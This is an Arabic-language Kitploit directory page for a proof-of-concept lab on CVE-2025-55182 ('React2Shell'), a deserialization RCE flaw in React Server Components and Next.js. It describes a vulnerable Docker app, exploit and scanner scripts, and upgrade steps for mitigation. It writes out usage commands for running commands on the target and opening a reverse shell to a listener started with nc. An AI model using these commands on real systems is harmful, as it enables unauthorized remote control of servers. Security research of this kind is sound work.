Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-55182-poc | Kitploit
أدوات/GitHubGitHub/mooowu/cve-2025-55182-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولاتمختبرات وتدريب عملي
GitHubmooowu/cve-2025-55182-poc

cve-2025-55182-poc

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182 (React2Shell) مختبر تحليل الثغرة الأمنية

يحتوي هذا المستودع على بيئة كاملة لتحليل وإعادة إنتاج CVE-2025-55182، وهي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد (RCE) في مكونات خادم React (RSC) التي تؤثر على React 19.x و Next.js 15.x.

⚠️ تحذير: يحتوي هذا المشروع عمدًا على تعليمات برمجية قابلة للاستغلال. لا تنشره على خادم عام أو بيئة إنتاج.

🔍 نظرة عامة على الثغرة

  • معرّف CVE: CVE-2025-55182
  • الاسم المستعار: React2Shell
  • درجة CVSS: 10.0 (CRITICAL)
  • نوع الثغرة: CWE-502 (Deserialization of Untrusted Data)
  • المكوّنات المتأثرة:
    • React Server Components (19.0.0 - 19.2.0)
    • Next.js (15.0.0 - 16.0.7)
    • react-server-dom-webpack, react-server-dom-turbopack

آلية الثغرة

تكمن الثغرة في الطريقة التي تعالج بها بيئة تشغيل مكونات خادم React البيانات المسلسلة القادمة من طلبات HTTP (Server Actions). يمكن للمهاجم صياغة حمولة ضارة لبروتوكول "Flight" تؤدي، عند إلغاء تسلسلها بواسطة الخادم، إلى تنفيذ تعليمات برمجية عشوائية قبل إجراء عمليات التحقق من المصادقة.

📂 هيكل المشروع

root@kitploit:~
react2shell/
├── vulnerable-app/       # Vulnerable Next.js 15 application
│   ├── app/
│   │   ├── actions.ts    # Vulnerable Server Actions
│   │   └── page.tsx      # UI for testing vulnerability
│   ├── Dockerfile        # Container definition
│   └── package.json
├── exploit/              # Exploit tools
│   ├── exploit.py        # Python PoC exploit
│   ├── scanner.py        # Vulnerability scanner
│   └── quick_exploit.sh  # Simple bash exploit
├── docs/                 # Analysis documentation
└── docker-compose.yml    # Isolated lab environment

🚀 البدء

المتطلبات الأساسية

  • Docker و Docker Compose
  • Python 3.x (لتشغيل أدوات الاستغلال محليًا)

1. تشغيل بيئة المختبر

شغّل التطبيق الضعيف في حاوية معزولة:

root@kitploit:~
docker-compose up -d --build

سيكون التطبيق متاحًا على http://localhost:3000.

2. التحقق من التطبيق

قم بزيارة http://localhost:3000 في متصفحك. يجب أن ترى واجهة "React2Shell Lab" مع عدة لوحات اختبار:

  • تنفيذ الأوامر: اختبار حقن الأوامر المباشر
  • إلغاء التسلسل غير الآمن: اختبار استغلالات إلغاء التسلسل المستندة إلى JSON
  • قراءة الملفات التعسفية: اختبار تجاوز المسار (Path Traversal)
  • معلومات النظام: عرض تفاصيل النظام (للتحقق من تأثير RCE)

⚔️ الاستغلال

نوفّر عدة أدوات لاختبار الثغرة.

استخدام أداة الاستغلال Python

  1. تثبيت المتطلبات:

    root@kitploit:~
    pip install -r exploit/requirements.txt
    
  2. تحقق من وجود الثغرة:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --check
    
  3. تنفيذ أمر:

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 -c "id"
    
  4. الصدفة العكسية (تتطلب مستمعًا، مثل nc -lvnp 4444):

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --revshell -l HOST_IP -p 4444
    

استخدام الماسح الضوئي

افحص عن حالات React/Next.js المعرضة للثغرة:

root@kitploit:~
python3 exploit/scanner.py -u http://localhost:3000

🛡️ التخفيف

لإصلاح هذه الثغرة في تطبيقاتك الخاصة:

  1. ترقية التبعيات:

    • قم بترقية React إلى الإصدار 19.3.0 أو أحدث.
    • قم بترقية Next.js إلى الإصدار 15.0.5 أو 15.1.9 أو 16.0.8 اعتمادًا على الفرع.
  2. التحقق من التصحيح: تحقق من package.json للتأكد من تحديث حزم react-server-dom-*.

📝 إخلاء مسؤولية

هذا المشروع مخصص للأغراض التعليمية وأبحاث الأمن فقط. لا يتحمل المؤلفون أي مسؤولية عن إساءة استخدام هذه المواد.

تنزيل الأداة